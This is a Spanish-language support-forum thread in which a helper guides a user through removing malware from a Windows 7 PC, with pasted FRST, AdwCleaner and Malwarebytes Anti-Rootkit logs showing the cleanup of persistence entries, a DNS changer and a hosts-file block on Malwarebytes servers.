HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3ce42c48-38d5-11e8-849d-78acc0bd591b} => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Software\Microsoft\Windows\CurrentVersion\Run\\COM+" => eliminado correctamente
C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk => movido correctamente
"C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe" => no encontrado
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA}" => eliminado correctamente
C:\Windows\System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{568A21DE-A13A-462D-94F2-3A85694880BF}" => eliminado correctamente
C:\Windows\Tasks\CCleaner Update.job => movido correctamente
"C:\Program Files\CCleaner" => no encontrado
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => eliminado correctamente
HKLM\System\CurrentControlSet\Services\fiddrv => eliminado correctamente
fiddrv => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\VGPU => eliminado correctamente
VGPU => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\XDva511 => eliminado correctamente
XDva511 => servicio eliminado correctamente
C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E} => movido correctamente
"CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"" => eliminado correctamente
"BVTFilter" => eliminado correctamente
"BVTConsumer" => eliminado correctamente
C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk => Acceso directo argumento eliminado correctamente
C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
========= Final de RemoveProxy: =========
========= netsh winsock reset =========
El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.
========= Final de CMD: =========
========= ipconfig /renew =========
Configuraci¢n IP de Windows
========= Final de CMD: =========
========= ipconfig /flushdns =========
Configuraci¢n IP de Windows
No se puede vaciar la cach‚ de resoluci¢n de DNS: Error de una funci¢n durante la ejecuci¢n.
========= Final de CMD: =========
========= bitsadmin /reset /allusers =========
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Unable to connect to BITS - 0x8007042c
No se puede iniciar el servicio o grupo de dependencia.
========= Final de CMD: =========
========= netsh advfirewall reset =========
Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est ejecutando e intente la solicitud de nuevo.
========= Final de CMD: =========
========= netsh advfirewall set allprofiles state ON =========
Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est ejecutando e intente la solicitud de nuevo.
========= Final de CMD: =========
========= netsh int ipv4 reset =========
No hay valores configurados por el usuario para restablecer.
========= Final de CMD: =========
========= netsh int ipv6 reset =========
No hay valores configurados por el usuario para restablecer.
========= Final de CMD: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 16438499 B
Java, Flash, Steam htmlcache => 11125976 B
Windows/system/drivers => 35290840 B
Edge => 0 B
Chrome => 461424075 B
Firefox => 5331236 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66356 B
LocalService => 132584 B
NetworkService => 282430 B
Familia Landaeta => 960903152 B
RecycleBin => 6032034105 B
EmptyTemp: => 7 GB datos temporales Eliminados.
================================
El sistema necesita reiniciarse.
==== Final Fixlog 08:17:26 ====
todo bien hazta el paso de instalar el malwarebytes y es que, comienza a instalarse, dura un par de minutos y se cierra el instalador
Bien… y ahora descarga en tu escritorio 
Windows Repair all in one, hazlo con la versión portable suele estar la última de todas donde veas que pone 
?
Es un fichero ZIP con este nombre 
tweaking.com_windows_repair_aio.zip, lo descomprimes y ejecutas desde la carpeta que se habrá generado en tu escritorio.
Haces doble clic sobre el archivo Repair_Windows.exe.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona Ejecutar como Administrador.- )
Aceptas en la primera pantalla la licencia de uso pulsando en I Agree y a continuación veras la pantalla inicial del programa, donde debes seguir estos pasos :
Repairs - Main.
Open Repairs.
Inmediatamente aparecerá esta nueva ventana, donde debes seguir pulsando en :
Start Repairs.
El proceso ira realizando todos los pasos establecidos y cuando termine ya Reinicias TU el equipo.
Trata de instalar de nuevo Malwarebytes
Saludos.
sigo teniendo problemas con el malwarebytes
Ejecuta la herramienta de desinstalación de Malwarebytes ,reinicias en PC y vuelve a tratar de instalarlo
persiste el error. Me recomiendas ejecutar el Adwcleaner?
Ejecuta Adwcleaner y ademas este otro.
Me pones ambos logs
adwcleaner me arrojo dos logs.
# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build: 04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 04-27-2020
# Duration: 00:00:01
# OS: Windows 7 Ultimate
# Cleaned: 2
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
Deleted HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}|DhcpNameServer - "37.120.145.234"
Deleted HKLM\System\CurrentControlSet\Services\Tcpip\Parameters|DhcpNameServer - "37.120.145.234"
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [1667 octets] - [27/04/2020 12:01:30]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build: 04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 04-27-2020
# Duration: 00:00:37
# OS: Windows 7 Ultimate
# Scanned: 31802
# Detected: 2
***** [ Services ] *****
No malicious services found.
***** [ Folders ] *****
No malicious folders found.
***** [ Files ] *****
No malicious files found.
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
No malicious tasks found.
***** [ Registry ] *****
PUP.Optional.DNSChanger HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}|DhcpNameServer - "37.120.145.234"
PUP.Optional.DNSChanger HKLM\System\CurrentControlSet\Services\Tcpip\Parameters|DhcpNameServer - "37.120.145.234"
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
No malicious Chromium URLs found.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
***** [ Hosts File Entries ] *****
No malicious hosts file entries found.
***** [ Preinstalled Software ] *****
No Preinstalled Software found.
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########y aquì los de malwarebytes antirootkit
Malwarebytes Anti-Rootkit BETA 1.10.3.1001
www.malwarebytes.org
Database version:
main: v2020.04.27.04
rootkit: v2020.04.27.04
Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 11.0.9600.19129
Familia Landaeta :: FAMILIALANDAETA [administrator]
27/04/2020 11:03:47
mbar-log-2020-04-27 (11-03-47).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 154687
Time elapsed: 24 minute(s), 57 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 0
(No malicious items detected)
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 3
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 keystone-prod.elasticbeanstalk.com) Good: () -> Replace on reboot. [def2d8e41eb8989e44199bf0cf358c74]
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 keystone.mwbsys.com) Good: () -> Replace on reboot. [c90705b7b12536002b33870407fd11ef]
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 serius.mwbsys.com) Good: () -> Replace on reboot. [e4ec5864b026c96db9a6b8d3c93b25db]
Physical Sectors Detected: 0
(No malicious items detected)
(end)---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.10.3.1001
(c) Malwarebytes Corporation 2011-2012
OS version: 6.1.7601 Windows 7 Service Pack 1 x86
Account is Administrative
Internet Explorer version: 11.0.9600.19129
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 3.200000 GHz
Memory total: 2111037440, free: 882274304
Downloaded database version: v2020.04.27.04
Downloaded database version: v2020.04.27.04
Downloaded database version: v2018.01.20.01
=======================================
Initializing...
Driver version: 4.3.0.15
------------ Kernel report ------------
04/27/2020 11:03:22
------------ Loaded modules -----------
\SystemRoot\system32\ntkrnlpa.exe
\SystemRoot\system32\halmacpi.dll
\SystemRoot\system32\kdcom.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\system32\CLFS.SYS
\SystemRoot\system32\CI.dll
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\ACPI.sys
\SystemRoot\system32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\msisadrv.sys
\SystemRoot\system32\drivers\pci.sys
\SystemRoot\system32\drivers\vdrvroot.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\system32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\system32\drivers\intelide.sys
\SystemRoot\system32\drivers\PCIIDEX.SYS
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\system32\drivers\atapi.sys
\SystemRoot\system32\drivers\ataport.SYS
\SystemRoot\system32\drivers\amdxata.sys
\SystemRoot\system32\drivers\fltmgr.sys
\SystemRoot\system32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Ntfs.sys
\SystemRoot\System32\Drivers\msrpc.sys
\SystemRoot\System32\Drivers\ksecdd.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\system32\drivers\vmstorfl.sys
\SystemRoot\system32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\spldr.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\System32\drivers\hwpolicy.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\system32\drivers\disk.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\drivers\VIDEOPRT.SYS
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\system32\drivers\rdpencdd.sys
\SystemRoot\system32\drivers\rdprefmp.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\DRIVERS\wfplwf.sys
\SystemRoot\system32\DRIVERS\pacer.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\drivers\termdd.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\system32\drivers\mssmbios.sys
\SystemRoot\System32\drivers\discache.sys
\SystemRoot\system32\drivers\csc.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\blbdrive.sys
\SystemRoot\system32\DRIVERS\tunnel.sys
\SystemRoot\system32\drivers\intelppm.sys
\SystemRoot\system32\DRIVERS\igdkmd32.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\dxgmms1.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\Rt86win7.sys
\SystemRoot\system32\drivers\usbuhci.sys
\SystemRoot\system32\drivers\USBPORT.SYS
\SystemRoot\system32\drivers\usbehci.sys
\SystemRoot\system32\drivers\wmiacpi.sys
\SystemRoot\system32\DRIVERS\CompositeBus.sys
\SystemRoot\system32\DRIVERS\AgileVpn.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\rassstp.sys
\SystemRoot\system32\DRIVERS\rdpbus.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\drivers\swenum.sys
\SystemRoot\system32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\umbus.sys
\SystemRoot\system32\drivers\usbhub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\drivers\HdAudio.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\Drivers\dump_dumpata.sys
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\system32\drivers\spsys.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\??\C:\Windows\system32\drivers\mbamchameleon.sys
\??\C:\Windows\system32\drivers\7372779E.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
----------- End -----------
Done!
Scan started
Database versions:
main: v2020.04.27.04
rootkit: v2020.04.27.04
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff85e5b160, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85e5ccc8, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffffff85e5b160, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff85d84918, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff85d82030, DeviceName: \Device\Ide\IdeDeviceP2T0L0-2\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: F362F362
Partition information:
Partition 0 type is Primary (0x7)
Partition is ACTIVE.
Partition starts at LBA: 2048 Numsec = 204800
Partition is bootable
Partition file system is NTFS
Partition 1 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 206848 Numsec = 312371200
Partition is not bootable
Partition file system is NTFS
Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Disk Size: 160041885696 bytes
Sector size: 512 bytes
Done!
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Scan finished
Creating System Restore point...
Cleaning up...
Removal successful. No system shutdown is required.
=======================================
Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removal finished